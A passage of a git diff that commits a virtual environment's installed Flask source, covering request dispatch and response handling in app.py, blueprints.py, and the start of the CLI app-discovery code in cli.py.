getattr(rule, "provide_automatic_options", False) + and req.method == "OPTIONS" + ): + return self.make_default_options_response() + # otherwise dispatch to the handler for that endpoint + view_args: dict[str, t.Any] = req.view_args # type: ignore[assignment] + return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) + + def full_dispatch_request(self) -> Response: + """Dispatches the request and on top of that performs request + pre and postprocessing as well as HTTP exception catching and + error handling. + + .. versionadded:: 0.7 + """ + self._got_first_request = True + + try: + request_started.send(self, _async_wrapper=self.ensure_sync) + rv = self.preprocess_request() + if rv is None: + rv = self.dispatch_request() + except Exception as e: + rv = self.handle_user_exception(e) + return self.finalize_request(rv) + + def finalize_request( + self, + rv: ft.ResponseReturnValue | HTTPException, + from_error_handler: bool = False, + ) -> Response: + """Given the return value from a view function this finalizes + the request by converting it into a response and invoking the + postprocessing functions. 
This is invoked for both normal + request dispatching as well as error handlers. + + Because this means that it might be called as a result of a + failure a special safe mode is available which can be enabled + with the `from_error_handler` flag. If enabled, failures in + response processing will be logged and otherwise ignored. + + :internal: + """ + response = self.make_response(rv) + try: + response = self.process_response(response) + request_finished.send( + self, _async_wrapper=self.ensure_sync, response=response + ) + except Exception: + if not from_error_handler: + raise + self.logger.exception( + "Request finalizing failed with an error while handling an error" + ) + return response + + def make_default_options_response(self) -> Response: + """This method is called to create the default ``OPTIONS`` response. + This can be changed through subclassing to change the default + behavior of ``OPTIONS`` responses. + + .. versionadded:: 0.7 + """ + adapter = request_ctx.url_adapter + methods = adapter.allowed_methods() # type: ignore[union-attr] + rv = self.response_class() + rv.allow.update(methods) + return rv + + def ensure_sync(self, func: t.Callable) -> t.Callable: + """Ensure that the function is synchronous for WSGI workers. + Plain ``def`` functions are returned as-is. ``async def`` + functions are wrapped to run and wait for the response. + + Override this method to change how the app runs async views. + + .. versionadded:: 2.0 + """ + if iscoroutinefunction(func): + return self.async_to_sync(func) + + return func + + def async_to_sync( + self, func: t.Callable[..., t.Coroutine] + ) -> t.Callable[..., t.Any]: + """Return a sync function that will run the coroutine function. + + .. code-block:: python + + result = app.async_to_sync(func)(*args, **kwargs) + + Override this method to change how the app converts async code + to be synchronously callable. + + .. versionadded:: 2.0 + """ + try: + from asgiref.sync import async_to_sync as asgiref_async_to_sync + except ImportError: + raise RuntimeError( + "Install Flask with the 'async' extra in order to use async views." + ) from None + + return asgiref_async_to_sync(func) + + def url_for( + self, + /, + endpoint: str, + *, + _anchor: str | None = None, + _method: str | None = None, + _scheme: str | None = None, + _external: bool | None = None, + **values: t.Any, + ) -> str: + """Generate a URL to the given endpoint with the given values. + + This is called by :func:`flask.url_for`, and can be called + directly as well. + + An *endpoint* is the name of a URL rule, usually added with + :meth:`@app.route() `, and usually the same name as the + view function. A route defined in a :class:`~flask.Blueprint` + will prepend the blueprint's name separated by a ``.`` to the + endpoint. + + In some cases, such as email messages, you want URLs to include + the scheme and domain, like ``https://example.com/hello``. When + not in an active request, URLs will be external by default, but + this requires setting :data:`SERVER_NAME` so Flask knows what + domain to use. :data:`APPLICATION_ROOT` and + :data:`PREFERRED_URL_SCHEME` should also be configured as + needed. This config is only used when not in an active request. + + Functions can be decorated with :meth:`url_defaults` to modify + keyword arguments before the URL is built. + + If building fails for some reason, such as an unknown endpoint + or incorrect values, the app's :meth:`handle_url_build_error` + method is called. 
If that returns a string, that is returned, + otherwise a :exc:`~werkzeug.routing.BuildError` is raised. + + :param endpoint: The endpoint name associated with the URL to + generate. If this starts with a ``.``, the current blueprint + name (if any) will be used. + :param _anchor: If given, append this as ``#anchor`` to the URL. + :param _method: If given, generate the URL associated with this + method for the endpoint. + :param _scheme: If given, the URL will have this scheme if it + is external. + :param _external: If given, prefer the URL to be internal + (False) or require it to be external (True). External URLs + include the scheme and domain. When not in an active + request, URLs are external by default. + :param values: Values to use for the variable parts of the URL + rule. Unknown keys are appended as query string arguments, + like ``?a=b&c=d``. + + .. versionadded:: 2.2 + Moved from ``flask.url_for``, which calls this method. + """ + req_ctx = _cv_request.get(None) + + if req_ctx is not None: + url_adapter = req_ctx.url_adapter + blueprint_name = req_ctx.request.blueprint + + # If the endpoint starts with "." and the request matches a + # blueprint, the endpoint is relative to the blueprint. + if endpoint[:1] == ".": + if blueprint_name is not None: + endpoint = f"{blueprint_name}{endpoint}" + else: + endpoint = endpoint[1:] + + # When in a request, generate a URL without scheme and + # domain by default, unless a scheme is given. + if _external is None: + _external = _scheme is not None + else: + app_ctx = _cv_app.get(None) + + # If called by helpers.url_for, an app context is active, + # use its url_adapter. Otherwise, app.url_for was called + # directly, build an adapter. + if app_ctx is not None: + url_adapter = app_ctx.url_adapter + else: + url_adapter = self.create_url_adapter(None) + + if url_adapter is None: + raise RuntimeError( + "Unable to build URLs outside an active request" + " without 'SERVER_NAME' configured. Also configure" + " 'APPLICATION_ROOT' and 'PREFERRED_URL_SCHEME' as" + " needed." + ) + + # When outside a request, generate a URL with scheme and + # domain by default. + if _external is None: + _external = True + + # It is an error to set _scheme when _external=False, in order + # to avoid accidental insecure URLs. + if _scheme is not None and not _external: + raise ValueError("When specifying '_scheme', '_external' must be True.") + + self.inject_url_defaults(endpoint, values) + + try: + rv = url_adapter.build( # type: ignore[union-attr] + endpoint, + values, + method=_method, + url_scheme=_scheme, + force_external=_external, + ) + except BuildError as error: + values.update( + _anchor=_anchor, _method=_method, _scheme=_scheme, _external=_external + ) + return self.handle_url_build_error(error, endpoint, values) + + if _anchor is not None: + _anchor = _url_quote(_anchor, safe="%!#$&'()*+,/:;=?@") + rv = f"{rv}#{_anchor}" + + return rv + + def make_response(self, rv: ft.ResponseReturnValue) -> Response: + """Convert the return value from a view function to an instance of + :attr:`response_class`. + + :param rv: the return value from the view function. The view function + must return a response. Returning ``None``, or the view ending + without returning, is not allowed. The following types are allowed + for ``view_rv``: + + ``str`` + A response object is created with the string encoded to UTF-8 + as the body. + + ``bytes`` + A response object is created with the bytes as the body. + + ``dict`` + A dictionary that will be jsonify'd before being returned. 
+ + ``list`` + A list that will be jsonify'd before being returned. + + ``generator`` or ``iterator`` + A generator that returns ``str`` or ``bytes`` to be + streamed as the response. + + ``tuple`` + Either ``(body, status, headers)``, ``(body, status)``, or + ``(body, headers)``, where ``body`` is any of the other types + allowed here, ``status`` is a string or an integer, and + ``headers`` is a dictionary or a list of ``(key, value)`` + tuples. If ``body`` is a :attr:`response_class` instance, + ``status`` overwrites the exiting value and ``headers`` are + extended. + + :attr:`response_class` + The object is returned unchanged. + + other :class:`~werkzeug.wrappers.Response` class + The object is coerced to :attr:`response_class`. + + :func:`callable` + The function is called as a WSGI application. The result is + used to create a response object. + + .. versionchanged:: 2.2 + A generator will be converted to a streaming response. + A list will be converted to a JSON response. + + .. versionchanged:: 1.1 + A dict will be converted to a JSON response. + + .. versionchanged:: 0.9 + Previously a tuple was interpreted as the arguments for the + response object. + """ + + status = headers = None + + # unpack tuple returns + if isinstance(rv, tuple): + len_rv = len(rv) + + # a 3-tuple is unpacked directly + if len_rv == 3: + rv, status, headers = rv # type: ignore[misc] + # decide if a 2-tuple has status or headers + elif len_rv == 2: + if isinstance(rv[1], (Headers, dict, tuple, list)): + rv, headers = rv + else: + rv, status = rv # type: ignore[assignment,misc] + # other sized tuples are not allowed + else: + raise TypeError( + "The view function did not return a valid response tuple." + " The tuple must have the form (body, status, headers)," + " (body, status), or (body, headers)." + ) + + # the body must not be None + if rv is None: + raise TypeError( + f"The view function for {request.endpoint!r} did not" + " return a valid response. The function either returned" + " None or ended without a return statement." + ) + + # make sure the body is an instance of the response class + if not isinstance(rv, self.response_class): + if isinstance(rv, (str, bytes, bytearray)) or isinstance(rv, _abc_Iterator): + # let the response class set the status and headers instead of + # waiting to do it manually, so that the class can handle any + # special logic + rv = self.response_class( + rv, + status=status, + headers=headers, # type: ignore[arg-type] + ) + status = headers = None + elif isinstance(rv, (dict, list)): + rv = self.json.response(rv) + elif isinstance(rv, BaseResponse) or callable(rv): + # evaluate a WSGI callable, or coerce a different response + # class to the correct type + try: + rv = self.response_class.force_type( + rv, request.environ # type: ignore[arg-type] + ) + except TypeError as e: + raise TypeError( + f"{e}\nThe view function did not return a valid" + " response. The return type must be a string," + " dict, list, tuple with headers or status," + " Response instance, or WSGI callable, but it" + f" was a {type(rv).__name__}." + ).with_traceback(sys.exc_info()[2]) from None + else: + raise TypeError( + "The view function did not return a valid" + " response. The return type must be a string," + " dict, list, tuple with headers or status," + " Response instance, or WSGI callable, but it was a" + f" {type(rv).__name__}." 
+ ) + + rv = t.cast(Response, rv) + # prefer the status if it was provided + if status is not None: + if isinstance(status, (str, bytes, bytearray)): + rv.status = status + else: + rv.status_code = status + + # extend existing headers with provided headers + if headers: + rv.headers.update(headers) # type: ignore[arg-type] + + return rv + + def preprocess_request(self) -> ft.ResponseReturnValue | None: + """Called before the request is dispatched. Calls + :attr:`url_value_preprocessors` registered with the app and the + current blueprint (if any). Then calls :attr:`before_request_funcs` + registered with the app and the blueprint. + + If any :meth:`before_request` handler returns a non-None value, the + value is handled as if it was the return value from the view, and + further request handling is stopped. + """ + names = (None, *reversed(request.blueprints)) + + for name in names: + if name in self.url_value_preprocessors: + for url_func in self.url_value_preprocessors[name]: + url_func(request.endpoint, request.view_args) + + for name in names: + if name in self.before_request_funcs: + for before_func in self.before_request_funcs[name]: + rv = self.ensure_sync(before_func)() + + if rv is not None: + return rv + + return None + + def process_response(self, response: Response) -> Response: + """Can be overridden in order to modify the response object + before it's sent to the WSGI server. By default this will + call all the :meth:`after_request` decorated functions. + + .. versionchanged:: 0.5 + As of Flask 0.5 the functions registered for after request + execution are called in reverse order of registration. + + :param response: a :attr:`response_class` object. + :return: a new response object or the same, has to be an + instance of :attr:`response_class`. + """ + ctx = request_ctx._get_current_object() # type: ignore[attr-defined] + + for func in ctx._after_request_functions: + response = self.ensure_sync(func)(response) + + for name in chain(request.blueprints, (None,)): + if name in self.after_request_funcs: + for func in reversed(self.after_request_funcs[name]): + response = self.ensure_sync(func)(response) + + if not self.session_interface.is_null_session(ctx.session): + self.session_interface.save_session(self, ctx.session, response) + + return response + + def do_teardown_request( + self, exc: BaseException | None = _sentinel # type: ignore + ) -> None: + """Called after the request is dispatched and the response is + returned, right before the request context is popped. + + This calls all functions decorated with + :meth:`teardown_request`, and :meth:`Blueprint.teardown_request` + if a blueprint handled the request. Finally, the + :data:`request_tearing_down` signal is sent. + + This is called by + :meth:`RequestContext.pop() `, + which may be delayed during testing to maintain access to + resources. + + :param exc: An unhandled exception raised while dispatching the + request. Detected from the current exception information if + not passed. Passed to each teardown function. + + .. versionchanged:: 0.9 + Added the ``exc`` argument. 
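+        As a rough sketch, a teardown function that would run at this point
+        might look like the following, where ``db_session`` stands in for an
+        application's own resource and is not defined by Flask::
+
+            @app.teardown_request
+            def cleanup(exc):
+                # exc is the unhandled exception, or None if the request
+                # finished without error.
+                db_session.remove()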
+ """ + if exc is _sentinel: + exc = sys.exc_info()[1] + + for name in chain(request.blueprints, (None,)): + if name in self.teardown_request_funcs: + for func in reversed(self.teardown_request_funcs[name]): + self.ensure_sync(func)(exc) + + request_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc) + + def do_teardown_appcontext( + self, exc: BaseException | None = _sentinel # type: ignore + ) -> None: + """Called right before the application context is popped. + + When handling a request, the application context is popped + after the request context. See :meth:`do_teardown_request`. + + This calls all functions decorated with + :meth:`teardown_appcontext`. Then the + :data:`appcontext_tearing_down` signal is sent. + + This is called by + :meth:`AppContext.pop() `. + + .. versionadded:: 0.9 + """ + if exc is _sentinel: + exc = sys.exc_info()[1] + + for func in reversed(self.teardown_appcontext_funcs): + self.ensure_sync(func)(exc) + + appcontext_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc) + + def app_context(self) -> AppContext: + """Create an :class:`~flask.ctx.AppContext`. Use as a ``with`` + block to push the context, which will make :data:`current_app` + point at this application. + + An application context is automatically pushed by + :meth:`RequestContext.push() ` + when handling a request, and when running a CLI command. Use + this to manually create a context outside of these situations. + + :: + + with app.app_context(): + init_db() + + See :doc:`/appcontext`. + + .. versionadded:: 0.9 + """ + return AppContext(self) + + def request_context(self, environ: dict) -> RequestContext: + """Create a :class:`~flask.ctx.RequestContext` representing a + WSGI environment. Use a ``with`` block to push the context, + which will make :data:`request` point at this request. + + See :doc:`/reqcontext`. + + Typically you should not call this from your own code. A request + context is automatically pushed by the :meth:`wsgi_app` when + handling a request. Use :meth:`test_request_context` to create + an environment and context instead of this method. + + :param environ: a WSGI environment + """ + return RequestContext(self, environ) + + def test_request_context(self, *args: t.Any, **kwargs: t.Any) -> RequestContext: + """Create a :class:`~flask.ctx.RequestContext` for a WSGI + environment created from the given values. This is mostly useful + during testing, where you may want to run a function that uses + request data without dispatching a full request. + + See :doc:`/reqcontext`. + + Use a ``with`` block to push the context, which will make + :data:`request` point at the request for the created + environment. :: + + with app.test_request_context(...): + generate_report() + + When using the shell, it may be easier to push and pop the + context manually to avoid indentation. :: + + ctx = app.test_request_context(...) + ctx.push() + ... + ctx.pop() + + Takes the same arguments as Werkzeug's + :class:`~werkzeug.test.EnvironBuilder`, with some defaults from + the application. See the linked Werkzeug docs for most of the + available arguments. Flask-specific behavior is listed here. + + :param path: URL path being requested. + :param base_url: Base URL where the app is being served, which + ``path`` is relative to. If not given, built from + :data:`PREFERRED_URL_SCHEME`, ``subdomain``, + :data:`SERVER_NAME`, and :data:`APPLICATION_ROOT`. + :param subdomain: Subdomain name to append to + :data:`SERVER_NAME`. 
+ :param url_scheme: Scheme to use instead of + :data:`PREFERRED_URL_SCHEME`. + :param data: The request body, either as a string or a dict of + form keys and values. + :param json: If given, this is serialized as JSON and passed as + ``data``. Also defaults ``content_type`` to + ``application/json``. + :param args: other positional arguments passed to + :class:`~werkzeug.test.EnvironBuilder`. + :param kwargs: other keyword arguments passed to + :class:`~werkzeug.test.EnvironBuilder`. + """ + from .testing import EnvironBuilder + + builder = EnvironBuilder(self, *args, **kwargs) + + try: + return self.request_context(builder.get_environ()) + finally: + builder.close() + + def wsgi_app(self, environ: dict, start_response: t.Callable) -> t.Any: + """The actual WSGI application. This is not implemented in + :meth:`__call__` so that middlewares can be applied without + losing a reference to the app object. Instead of doing this:: + + app = MyMiddleware(app) + + It's a better idea to do this instead:: + + app.wsgi_app = MyMiddleware(app.wsgi_app) + + Then you still have the original application object around and + can continue to call methods on it. + + .. versionchanged:: 0.7 + Teardown events for the request and app contexts are called + even if an unhandled error occurs. Other events may not be + called depending on when an error occurs during dispatch. + See :ref:`callbacks-and-errors`. + + :param environ: A WSGI environment. + :param start_response: A callable accepting a status code, + a list of headers, and an optional exception context to + start the response. + """ + ctx = self.request_context(environ) + error: BaseException | None = None + try: + try: + ctx.push() + response = self.full_dispatch_request() + except Exception as e: + error = e + response = self.handle_exception(e) + except: # noqa: B001 + error = sys.exc_info()[1] + raise + return response(environ, start_response) + finally: + if "werkzeug.debug.preserve_context" in environ: + environ["werkzeug.debug.preserve_context"](_cv_app.get()) + environ["werkzeug.debug.preserve_context"](_cv_request.get()) + + if error is not None and self.should_ignore_error(error): + error = None + + ctx.pop(error) + + def __call__(self, environ: dict, start_response: t.Callable) -> t.Any: + """The WSGI server calls the Flask application object as the + WSGI application. This calls :meth:`wsgi_app`, which can be + wrapped to apply middleware. + """ + return self.wsgi_app(environ, start_response) diff --git a/env/Lib/site-packages/flask/blueprints.py b/env/Lib/site-packages/flask/blueprints.py new file mode 100644 index 00000000..3a37a2c4 --- /dev/null +++ b/env/Lib/site-packages/flask/blueprints.py @@ -0,0 +1,91 @@ +from __future__ import annotations + +import os +import typing as t +from datetime import timedelta + +from .globals import current_app +from .helpers import send_from_directory +from .sansio.blueprints import Blueprint as SansioBlueprint +from .sansio.blueprints import BlueprintSetupState as BlueprintSetupState # noqa + +if t.TYPE_CHECKING: # pragma: no cover + from .wrappers import Response + + +class Blueprint(SansioBlueprint): + def get_send_file_max_age(self, filename: str | None) -> int | None: + """Used by :func:`send_file` to determine the ``max_age`` cache + value for a given file path if it wasn't passed. + + By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from + the configuration of :data:`~flask.current_app`. 
This defaults + to ``None``, which tells the browser to use conditional requests + instead of a timed cache, which is usually preferable. + + Note this is a duplicate of the same method in the Flask + class. + + .. versionchanged:: 2.0 + The default configuration is ``None`` instead of 12 hours. + + .. versionadded:: 0.9 + """ + value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"] + + if value is None: + return None + + if isinstance(value, timedelta): + return int(value.total_seconds()) + + return value + + def send_static_file(self, filename: str) -> Response: + """The view function used to serve files from + :attr:`static_folder`. A route is automatically registered for + this view at :attr:`static_url_path` if :attr:`static_folder` is + set. + + Note this is a duplicate of the same method in the Flask + class. + + .. versionadded:: 0.5 + + """ + if not self.has_static_folder: + raise RuntimeError("'static_folder' must be set to serve static_files.") + + # send_file only knows to call get_send_file_max_age on the app, + # call it here so it works for blueprints too. + max_age = self.get_send_file_max_age(filename) + return send_from_directory( + t.cast(str, self.static_folder), filename, max_age=max_age + ) + + def open_resource(self, resource: str, mode: str = "rb") -> t.IO[t.AnyStr]: + """Open a resource file relative to :attr:`root_path` for + reading. + + For example, if the file ``schema.sql`` is next to the file + ``app.py`` where the ``Flask`` app is defined, it can be opened + with: + + .. code-block:: python + + with app.open_resource("schema.sql") as f: + conn.executescript(f.read()) + + :param resource: Path to the resource relative to + :attr:`root_path`. + :param mode: Open the file in this mode. Only reading is + supported, valid values are "r" (or "rt") and "rb". + + Note this is a duplicate of the same method in the Flask + class. + + """ + if mode not in {"r", "rt", "rb"}: + raise ValueError("Resources can only be opened for reading.") + + return open(os.path.join(self.root_path, resource), mode) diff --git a/env/Lib/site-packages/flask/cli.py b/env/Lib/site-packages/flask/cli.py new file mode 100644 index 00000000..dda266b3 --- /dev/null +++ b/env/Lib/site-packages/flask/cli.py @@ -0,0 +1,1068 @@ +from __future__ import annotations + +import ast +import importlib.metadata +import inspect +import os +import platform +import re +import sys +import traceback +import typing as t +from functools import update_wrapper +from operator import itemgetter + +import click +from click.core import ParameterSource +from werkzeug import run_simple +from werkzeug.serving import is_running_from_reloader +from werkzeug.utils import import_string + +from .globals import current_app +from .helpers import get_debug_flag +from .helpers import get_load_dotenv + +if t.TYPE_CHECKING: + from .app import Flask + + +class NoAppException(click.UsageError): + """Raised if an application cannot be found or loaded.""" + + +def find_best_app(module): + """Given a module instance this tries to find the best possible + application in the module or raises an exception. + """ + from . import Flask + + # Search for the most common names first. + for attr_name in ("app", "application"): + app = getattr(module, attr_name, None) + + if isinstance(app, Flask): + return app + + # Otherwise find the only object that is a Flask instance. 
+ matches = [v for v in module.__dict__.values() if isinstance(v, Flask)] + + if len(matches) == 1: + return matches[0] + elif len(matches) > 1: + raise NoAppException( + "Detected multiple Flask applications in module" + f" '{module.__name__}'. Use '{module.__name__}:name'" + " to specify the correct one." + ) + + # Search for app factory functions. + for attr_name in ("create_app", "make_app"): + app_factory = getattr(module, attr_name, None) + + if inspect.isfunction(app_factory): + try: + app = app_factory() + + if isinstance(app, Flask): + return app + except TypeError as e: + if not _called_with_wrong_args(app_factory): + raise + + raise NoAppException( + f"Detected factory '{attr_name}' in module '{module.__name__}'," + " but could not call it without arguments. Use" + f" '{module.__name__}:{attr_name}(args)'" + " to specify arguments." + ) from e + + raise NoAppException( + "Failed to find Flask application or factory in module" + f" '{module.__name__}'. Use '{module.__name__}:name'" + " to specify one." + ) + + +def _called_with_wrong_args(f): + """Check whether calling a function raised a ``TypeError`` because + the call failed or because something in the factory raised the + error. + + :param f: The function that was called. + :return: ``True`` if the call failed. + """ + tb = sys.exc_info()[2] + + try: + while tb is not None: + if tb.tb_frame.f_code is f.__code__: + # In the function, it was called successfully. + return False + + tb = tb.tb_next + + # Didn't reach the function. + return True + finally: + # Delete tb to break a circular reference. + # https://docs.python.org/2/library/sys.html#sys.exc_info + del tb + + +def find_app_by_string(module, app_name): + """Check if the given string is a variable name or a function. Call + a function to get the app instance, or return the variable directly. + """ + from . import Flask + + # Parse app_name as a single expression to determine if it's a valid + # attribute name or function call. + try: + expr = ast.parse(app_name.strip(), mode="eval").body + except SyntaxError: + raise NoAppException( + f"Failed to parse {app_name!r} as an attribute name or function call." + ) from None + + if isinstance(expr, ast.Name): + name = expr.id + args = [] + kwargs = {} + elif isinstance(expr, ast.Call): + # Ensure the function name is an attribute name only. + if not isinstance(expr.func, ast.Name): + raise NoAppException( + f"Function reference must be a simple name: {app_name!r}." + ) + + name = expr.func.id + + # Parse the positional and keyword arguments as literals. + try: + args = [ast.literal_eval(arg) for arg in expr.args] + kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords} + except ValueError: + # literal_eval gives cryptic error messages, show a generic + # message with the full expression instead. + raise NoAppException( + f"Failed to parse arguments as literal values: {app_name!r}." + ) from None + else: + raise NoAppException( + f"Failed to parse {app_name!r} as an attribute name or function call." + ) + + try: + attr = getattr(module, name) + except AttributeError as e: + raise NoAppException( + f"Failed to find attribute {name!r} in {module.__name__!r}." + ) from e + + # If the attribute is a function, call it with any args and kwargs + # to get the real application. 
+ if inspect.isfunction(attr): + try: + app = attr(*args, **kwargs) + except TypeError as e: + if not _called_with_wrong_args(attr): + raise + + raise NoAppException( + f"The factory {app_name!r} in module" + f" {module.__name__!r} could not be called with the" + " specified arguments." + ) from e + else: + app = attr + + if isinstance(app, Flask): + return app + + raise NoAppException( + "A valid Flask application was not obtained from" + f" '{module.__name__}:{app_name}'." + ) + + +def prepare_import(path): + """Given a filename this will try to calculate the python path, add it + to the search path and return the actual module name that is expected. + """ + path = os.path.realpath(path) + + fname, ext = os.path.splitext(path) + if ext == ".py": + path = fname + + if os.path.basename(path) == "__init__": + path = os.path.dirname(path) + + module_name = [] + + # move up until outside package structure (no __init__.py) + while True: + path, name = os.path.split(path) + module_name.append(name) + + if not os.path.exists(os.path.join(path, "__init__.py")): + break + + if sys.path[0] != path: + sys.path.insert(0, path) + + return ".".join(module_name[::-1]) + + +def locate_app(module_name, app_name, raise_if_not_found=True): + try: + __import__(module_name) + except ImportError: + # Reraise the ImportError if it occurred within the imported module. + # Determine this by checking whether the trace has a depth > 1. + if sys.exc_info()[2].tb_next: + raise NoAppException( + f"While importing {module_name!r}, an ImportError was" + f" raised:\n\n{traceback.format_exc()}" + ) from None + elif raise_if_not_found: + raise NoAppException(f"Could not import {module_name!r}.") from None + else: + return + + module = sys.modules[module_name] + + if app_name is None: + return find_best_app(module) + else: + return find_app_by_string(module, app_name) + + +def get_version(ctx, param, value): + if not value or ctx.resilient_parsing: + return + + flask_version = importlib.metadata.version("flask") + werkzeug_version = importlib.metadata.version("werkzeug") + + click.echo( + f"Python {platform.python_version()}\n" + f"Flask {flask_version}\n" + f"Werkzeug {werkzeug_version}", + color=ctx.color, + ) + ctx.exit() + + +version_option = click.Option( + ["--version"], + help="Show the Flask version.", + expose_value=False, + callback=get_version, + is_flag=True, + is_eager=True, +) + + +class ScriptInfo: + """Helper object to deal with Flask applications. This is usually not + necessary to interface with as it's used internally in the dispatching + to click. In future versions of Flask this object will most likely play + a bigger role. Typically it's created automatically by the + :class:`FlaskGroup` but you can also manually create it and pass it + onwards as click object. + """ + + def __init__( + self, + app_import_path: str | None = None, + create_app: t.Callable[..., Flask] | None = None, + set_debug_flag: bool = True, + ) -> None: + #: Optionally the import path for the Flask application. + self.app_import_path = app_import_path + #: Optionally a function that is passed the script info to create + #: the instance of the application. + self.create_app = create_app + #: A dictionary with arbitrary data that can be associated with + #: this script info. + self.data: dict[t.Any, t.Any] = {} + self.set_debug_flag = set_debug_flag + self._loaded_app: Flask | None = None + + def load_app(self) -> Flask: + """Loads the Flask app (if not yet loaded) and returns it. 
Calling + this multiple times will just result in the already loaded app to + be returned. + """ + if self._loaded_app is not None: + return self._loaded_app + + if self.create_app is not None: + app = self.create_app() + else: + if self.app_import_path: + path, name = ( + re.split(r":(?![\\/])", self.app_import_path, maxsplit=1) + [None] + )[:2] + import_name = prepare_import(path) + app = locate_app(import_name, name) + else: + for path in ("wsgi.py", "app.py"): + import_name = prepare_import(path) + app = locate_app(import_name, None, raise_if_not_found=False) + + if app: + break + + if not app: + raise NoAppException( + "Could not locate a Flask application. Use the" + " 'flask --app' option, 'FLASK_APP' environment" + " variable, or a 'wsgi.py' or 'app.py' file in the" + " current directory." + ) + + if self.set_debug_flag: + # Update the app's debug flag through the descriptor so that + # other values repopulate as well. + app.debug = get_debug_flag() + + self._loaded_app = app + return app + + +pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True) + + +def with_appcontext(f): + """Wraps a callback so that it's guaranteed to be executed with the + script's application context. + + Custom commands (and their options) registered under ``app.cli`` or + ``blueprint.cli`` will always have an app context available, this + decorator is not required in that case. + + .. versionchanged:: 2.2 + The app context is active for subcommands as well as the + decorated callback. The app context is always available to + ``app.cli`` command and parameter callbacks. + """ + + @click.pass_context + def decorator(__ctx, *args, **kwargs): + if not current_app: + app = __ctx.ensure_object(ScriptInfo).load_app() + __ctx.with_resource(app.app_context()) + + return __ctx.invoke(f, *args, **kwargs) + + return update_wrapper(decorator, f) + + +class AppGroup(click.Group): + """This works similar to a regular click :class:`~click.Group` but it + changes the behavior of the :meth:`command` decorator so that it + automatically wraps the functions in :func:`with_appcontext`. + + Not to be confused with :class:`FlaskGroup`. + """ + + def command(self, *args, **kwargs): + """This works exactly like the method of the same name on a regular + :class:`click.Group` but it wraps callbacks in :func:`with_appcontext` + unless it's disabled by passing ``with_appcontext=False``. + """ + wrap_for_ctx = kwargs.pop("with_appcontext", True) + + def decorator(f): + if wrap_for_ctx: + f = with_appcontext(f) + return click.Group.command(self, *args, **kwargs)(f) + + return decorator + + def group(self, *args, **kwargs): + """This works exactly like the method of the same name on a regular + :class:`click.Group` but it defaults the group class to + :class:`AppGroup`. + """ + kwargs.setdefault("cls", AppGroup) + return click.Group.group(self, *args, **kwargs) + + +def _set_app(ctx: click.Context, param: click.Option, value: str | None) -> str | None: + if value is None: + return None + + info = ctx.ensure_object(ScriptInfo) + info.app_import_path = value + return value + + +# This option is eager so the app will be available if --help is given. +# --help is also eager, so --app must be before it in the param list. +# no_args_is_help bypasses eager processing, so this option must be +# processed manually in that case to ensure FLASK_APP gets picked up. +_app_option = click.Option( + ["-A", "--app"], + metavar="IMPORT", + help=( + "The Flask application or factory function to load, in the form 'module:name'." 
+ " Module can be a dotted import or file path. Name is not required if it is" + " 'app', 'application', 'create_app', or 'make_app', and can be 'name(args)' to" + " pass arguments." + ), + is_eager=True, + expose_value=False, + callback=_set_app, +) + + +def _set_debug(ctx: click.Context, param: click.Option, value: bool) -> bool | None: + # If the flag isn't provided, it will default to False. Don't use + # that, let debug be set by env in that case. + source = ctx.get_parameter_source(param.name) # type: ignore[arg-type] + + if source is not None and source in ( + ParameterSource.DEFAULT, + ParameterSource.DEFAULT_MAP, + ): + return None + + # Set with env var instead of ScriptInfo.load so that it can be + # accessed early during a factory function. + os.environ["FLASK_DEBUG"] = "1" if value else "0" + return value + + +_debug_option = click.Option( + ["--debug/--no-debug"], + help="Set debug mode.", + expose_value=False, + callback=_set_debug, +) + + +def _env_file_callback( + ctx: click.Context, param: click.Option, value: str | None +) -> str | None: + if value is None: + return None + + import importlib + + try: + importlib.import_module("dotenv") + except ImportError: + raise click.BadParameter( + "python-dotenv must be installed to load an env file.", + ctx=ctx, + param=param, + ) from None + + # Don't check FLASK_SKIP_DOTENV, that only disables automatically + # loading .env and .flaskenv files. + load_dotenv(value) + return value + + +# This option is eager so env vars are loaded as early as possible to be +# used by other options. +_env_file_option = click.Option( + ["-e", "--env-file"], + type=click.Path(exists=True, dir_okay=False), + help="Load environment variables from this file. python-dotenv must be installed.", + is_eager=True, + expose_value=False, + callback=_env_file_callback, +) + + +class FlaskGroup(AppGroup): + """Special subclass of the :class:`AppGroup` group that supports + loading more commands from the configured Flask app. Normally a + developer does not have to interface with this class but there are + some very advanced use cases for which it makes sense to create an + instance of this. see :ref:`custom-scripts`. + + :param add_default_commands: if this is True then the default run and + shell commands will be added. + :param add_version_option: adds the ``--version`` option. + :param create_app: an optional callback that is passed the script info and + returns the loaded app. + :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv` + files to set environment variables. Will also change the working + directory to the directory containing the first file found. + :param set_debug_flag: Set the app's debug flag. + + .. versionchanged:: 2.2 + Added the ``-A/--app``, ``--debug/--no-debug``, ``-e/--env-file`` options. + + .. versionchanged:: 2.2 + An app context is pushed when running ``app.cli`` commands, so + ``@with_appcontext`` is no longer required for those commands. + + .. versionchanged:: 1.0 + If installed, python-dotenv will be used to load environment variables + from :file:`.env` and :file:`.flaskenv` files. + """ + + def __init__( + self, + add_default_commands: bool = True, + create_app: t.Callable[..., Flask] | None = None, + add_version_option: bool = True, + load_dotenv: bool = True, + set_debug_flag: bool = True, + **extra: t.Any, + ) -> None: + params = list(extra.pop("params", None) or ()) + # Processing is done with option callbacks instead of a group + # callback. 
